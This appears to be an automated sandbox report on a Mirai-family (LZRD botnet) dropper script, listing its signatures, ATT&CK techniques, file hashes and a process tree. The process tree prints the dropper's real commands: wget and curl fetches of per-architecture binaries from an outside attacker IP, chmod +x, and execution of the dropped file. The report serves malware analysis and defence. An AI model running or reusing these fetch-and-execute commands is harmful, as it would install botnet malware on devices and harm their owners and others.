mirai | 8aa5a26c3c99eb1c6b59b1396880545253b62746117a2f122c658acf3b418433

Analysis

max time kernel
146s
max time network
151s
platform
debian-9_mipsel
resource
debian9-mipsel-20240226-en
resource tags

arch:mipselimage:debian9-mipsel-20240226-enkernel:4.9.0-13-4kc-maltalocale:en-usos:debian-9-mipselsystem
submitted
26/03/2025, 23:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ohshit.sh
Size

3KB
MD5

3b746c5758c3e8191384e8e28cadd0ae
SHA1

cf7164adbb686ad45e8512dd2660fc1124794566
SHA256

8aa5a26c3c99eb1c6b59b1396880545253b62746117a2f122c658acf3b418433
SHA512

70afe1a6a19dcb83b449351b25ea414a3c6e54e4249d637f4b8026aa0b5cf972b5da0ec374d72c1cb43349475d66829253b4f95c6709fbd26e925e995f5f73bf

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
806	chmod
892	chmod
779	chmod
869	chmod
881	chmod
886	chmod
728	chmod
734	chmod
750	chmod
800	chmod
857	chmod
863	chmod
819	chmod
851	chmod
875	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/Chaotic	729	ohshit.sh
/tmp/Chaotic	735	ohshit.sh
/tmp/Chaotic	751	ohshit.sh
/tmp/Chaotic	781	ohshit.sh
/tmp/Chaotic	801	ohshit.sh
/tmp/Chaotic	807	ohshit.sh
/tmp/Chaotic	820	ohshit.sh
/tmp/Chaotic	852	ohshit.sh
/tmp/Chaotic	858	ohshit.sh
/tmp/Chaotic	864	ohshit.sh
/tmp/Chaotic	870	ohshit.sh
/tmp/Chaotic	876	ohshit.sh
/tmp/Chaotic	882	ohshit.sh
/tmp/Chaotic	887	ohshit.sh
/tmp/Chaotic	893	ohshit.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	Chaotic
File opened for modification	/dev/misc/watchdog	Chaotic

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/bin/watchdog	Chaotic
File opened for modification	/sbin/watchdog	Chaotic

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral4/files/fstream-5.dat	upx
behavioral4/files/fstream-6.dat	upx
behavioral4/files/fstream-7.dat	upx
behavioral4/files/fstream-8.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/14/status	Chaotic
File opened for reading	/proc/114/status	Chaotic
File opened for reading	/proc/818/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/5/status	Chaotic
File opened for reading	/proc/7/status	Chaotic
File opened for reading	/proc/11/status	Chaotic
File opened for reading	/proc/36/status	Chaotic
File opened for reading	/proc/329/status	Chaotic
File opened for reading	/proc/696/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/12/status	Chaotic
File opened for reading	/proc/37/status	Chaotic
File opened for reading	/proc/19/status	Chaotic
File opened for reading	/proc/15/status	Chaotic
File opened for reading	/proc/82/status	Chaotic
File opened for reading	/proc/395/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/71/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/73/status	Chaotic
File opened for reading	/proc/76/status	Chaotic
File opened for reading	/proc/80/status	Chaotic
File opened for reading	/proc/148/status	Chaotic
File opened for reading	/proc/353/status	Chaotic
File opened for reading	/proc/386/status	Chaotic
File opened for reading	/proc/2/status	Chaotic
File opened for reading	/proc/13/status	Chaotic
File opened for reading	/proc/20/status	Chaotic
File opened for reading	/proc/23/status	Chaotic
File opened for reading	/proc/674/status	Chaotic
File opened for reading	/proc/694/status	Chaotic
File opened for reading	/proc/820/status	Chaotic
File opened for reading	/proc/10/status	Chaotic
File opened for reading	/proc/24/status	Chaotic
File opened for reading	/proc/693/status	Chaotic
File opened for reading	/proc/695/status	Chaotic
File opened for reading	/proc/74/status	Chaotic
File opened for reading	/proc/164/status	Chaotic
File opened for reading	/proc/497/status	Chaotic
File opened for reading	/proc/536/status	Chaotic
File opened for reading	/proc/1/status	Chaotic
File opened for reading	/proc/16/status	Chaotic
File opened for reading	/proc/17/status	Chaotic
File opened for reading	/proc/21/status	Chaotic
File opened for reading	/proc/240/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/3/status	Chaotic
File opened for reading	/proc/22/status	Chaotic
File opened for reading	/proc/78/status	Chaotic
File opened for reading	/proc/115/status	Chaotic
File opened for reading	/proc/144/status	Chaotic
File opened for reading	/proc/374/status	Chaotic
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/sys/crypto/fips_enabled	curl
File opened for reading	/proc/6/status	Chaotic
File opened for reading	/proc/18/status	Chaotic
File opened for reading	/proc/70/status	Chaotic
File opened for reading	/proc/77/status	Chaotic
File opened for reading	/proc/352/status	Chaotic

System Network Configuration Discovery 1 TTPs 6 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
796	curl
799	cat
803	wget
804	curl
805	cat
784	wget

Writes file to tmp directory 30 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sparc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	wget
File opened for modification	/tmp/busybox	cp
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arc	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm7	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.ppc	wget
File opened for modification	/tmp/Chaotic	ohshit.sh
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.i686	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	wget
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm5	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.arm6	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.m68k	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.sh4	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.x86_64	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mips	curl
File opened for modification	/tmp/ub8ehJSePAfc9FYqZIT6.mpsl	wget

/tmp/ohshit.sh
/tmp/ohshit.sh
1⤵
- Executes dropped EXE
- Writes file to tmp directory
PID:696
- /bin/cp
  cp /bin/busybox /tmp/
  2⤵
  - Writes file to tmp directory
  PID:702
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:705
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - Writes file to tmp directory
  PID:722
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  PID:727
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-42ed966197544e9a9b633d1a3102be49-systemd-timedated.service-BXEVSL ub8ehJSePAfc9FYqZIT6.arc
  2⤵
  - File and Directory Permissions Modification
  PID:728
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:729
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Writes file to tmp directory
  PID:731
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:732
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  PID:733
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-42ed966197544e9a9b633d1a3102be49-systemd-timedated.service-BXEVSL ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86
  2⤵
  - File and Directory Permissions Modification
  PID:734
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:735
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Writes file to tmp directory
  PID:737
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:738
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  PID:748
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh systemd-private-42ed966197544e9a9b633d1a3102be49-systemd-timedated.service-BXEVSL ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:750
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:751
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Writes file to tmp directory
  PID:754
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:764
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.i686
  2⤵
  PID:777
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:779
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:781
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:784
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:796
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips
  2⤵
  - System Network Configuration Discovery
  PID:799
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:800
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:801
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:803
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:804
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mips64
  2⤵
  - System Network Configuration Discovery
  PID:805
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:806
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:807
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Writes file to tmp directory
  PID:808
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:809
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.mpsl
  2⤵
  PID:817
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:819
- /tmp/Chaotic
  ./Chaotic
  2⤵
  - Modifies Watchdog functionality
  - Writes file to system bin folder
  - Reads runtime system information
  PID:820
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Writes file to tmp directory
  PID:848
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:849
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm
  2⤵
  PID:850
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:851
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:852
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Writes file to tmp directory
  PID:854
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:855
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm5
  2⤵
  PID:856
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:857
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:858
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Writes file to tmp directory
  PID:860
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:861
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm6
  2⤵
  PID:862
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:863
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:864
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Writes file to tmp directory
  PID:866
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:867
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.arm7
  2⤵
  PID:868
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:869
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:870
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Writes file to tmp directory
  PID:872
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:873
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.ppc
  2⤵
  PID:874
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:875
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:876
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:878
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  - Writes file to tmp directory
  PID:879
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sparc
  2⤵
  PID:880
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:881
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:882
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Writes file to tmp directory
  PID:883
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:884
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.m68k
  2⤵
  PID:885
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:886
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:887
- /usr/bin/wget
  wget http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Writes file to tmp directory
  PID:889
- /usr/bin/curl
  curl -O http://61.7.209.116/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  - Reads runtime system information
  - Writes file to tmp directory
  PID:890
- /bin/cat
  cat ub8ehJSePAfc9FYqZIT6.sh4
  2⤵
  PID:891
- /bin/chmod
  chmod +x busybox Chaotic ohshit.sh ub8ehJSePAfc9FYqZIT6.arc ub8ehJSePAfc9FYqZIT6.arm ub8ehJSePAfc9FYqZIT6.arm5 ub8ehJSePAfc9FYqZIT6.arm6 ub8ehJSePAfc9FYqZIT6.arm7 ub8ehJSePAfc9FYqZIT6.i686 ub8ehJSePAfc9FYqZIT6.m68k ub8ehJSePAfc9FYqZIT6.mips ub8ehJSePAfc9FYqZIT6.mips64 ub8ehJSePAfc9FYqZIT6.mpsl ub8ehJSePAfc9FYqZIT6.ppc ub8ehJSePAfc9FYqZIT6.sh4 ub8ehJSePAfc9FYqZIT6.sparc ub8ehJSePAfc9FYqZIT6.x86 ub8ehJSePAfc9FYqZIT6.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:892
- /tmp/Chaotic
  ./Chaotic
  2⤵
  PID:893

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/Chaotic

Filesize
37KB

MD5
30cd627f38ed8d3f4d88f70db155f6e4

SHA1
dac9a3568bf25a78f8f452f13ee5324c06e0e697

SHA256
6f1da6623189a369e919942eda96a280333476c065f7f52dc104835e7784c7b0

SHA512
bb9292720ffb56044b193ae917ffc81cfd690a5b1ef9e43e87765d9dc15111e401a7a82e7210014c96adce42beace4a803d8fa132e55f0a7687627b734620c6a

Download Submit
/tmp/Chaotic

Filesize
36KB

MD5
d9f6dcc3340583536c2c78cedbd66e7f

SHA1
d26bd4c263708c093614e629c41377a6d4869995

SHA256
5021c7b20ca08e98a7b36461d82a486acd1528890d8e3fa575a6df9ecbf5c6a7

SHA512
dcd0e366076600ca848bbb3129ff06e556fa12bc98c9858ea7ce5945f77695227b538d62d019b7582c3120ec8ce6622375bfaaa9514fdae8df25b49581c85711

Download Submit
/tmp/Chaotic

Filesize
37KB

MD5
ba44f08a5539f2ff023791d8fa5971ad

SHA1
e9ee840954010d76206bb79deaa187a020ba175b

SHA256
b5292146e8ab7b2454b1bb45370acf1a2f8ed9f315e3b59fd8c5752dd57f8b16

SHA512
15682f1f3b24a1848e82fa71a9c65a7dcd6b0dc2d2c162ae7653c335306bce13194db9532a5ced94b9798cdf36f27880c9530e0666a9185bd5dcec18f852882f

Download Submit
/tmp/Chaotic

Filesize
43KB

MD5
dfca537c507ed591e9a28dc15097cfef

SHA1
cd438b650795af3bbc91243600590ab955d66b33

SHA256
97aa2a737bc4a8f77afece3a67900da159063972bca6e153effdc8617972bfcc

SHA512
7753f242b840b6f815278f4f693eeea586444212e080fef40f510b85e47e604e4e0e8f65e00e81a775826827428f963d9f77f7a8e6c7c0986ffda4a5867274b2

Download Submit
/tmp/Chaotic

Filesize
95KB

MD5
15224bade89c1727c7151906feefeef3

SHA1
d8699054e4ad771025c789c93d9f0657f3e2c177

SHA256
c4a92d23b12a594223d79407c1b90a09b7ae8716731e57c4ee1f523e59facd2b

SHA512
9a3a62ae84a7590919f6c7769e728d0c75e2302c457e62bb6c2ac65823419b22ace15fdc8ca7be22a6e87903c7fc99527647e3151e44a86001a23b92bb852691

Download Submit
/tmp/busybox

Filesize
857KB

MD5
6ffc46165b5d9726a6607f3ea5305589

SHA1
ab127220f42e816b413dde0d17031e251a7bc98f

SHA256
80d636e2f1237e9adc9ea0bf7f42b17d7df8781db0684c33696411e50588a38c

SHA512
456fcd5d5bda524ef5236e00695a891cfefe15364f9c7a4ff04ad7dfdc7fd1726f037e905622216f13aee6c2d4ee90be0c850de82b3aac1d02a643db9f935af8

Download Submit
/tmp/ub8ehJSePAfc9FYqZIT6.arc

Filesize
113KB

MD5
5aaaec2c2edead8e37df9a743a4376f1

SHA1
6510eaf91c6a8e43b76c7cc4c8f67da5e8869cc2

SHA256
8accc9c4f37d8abe5bfe886162ca52aaf6b1ab4f21583126f235cfffe450dba2

SHA512
d1a5d33047fa2d2e9d8ec976f4099d182deb38415f899231b38c15502f56923c8a3efe08d8786960ba9c5a4f62d880e14b081e66feadc3948f2f523557242318

Download Submit

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads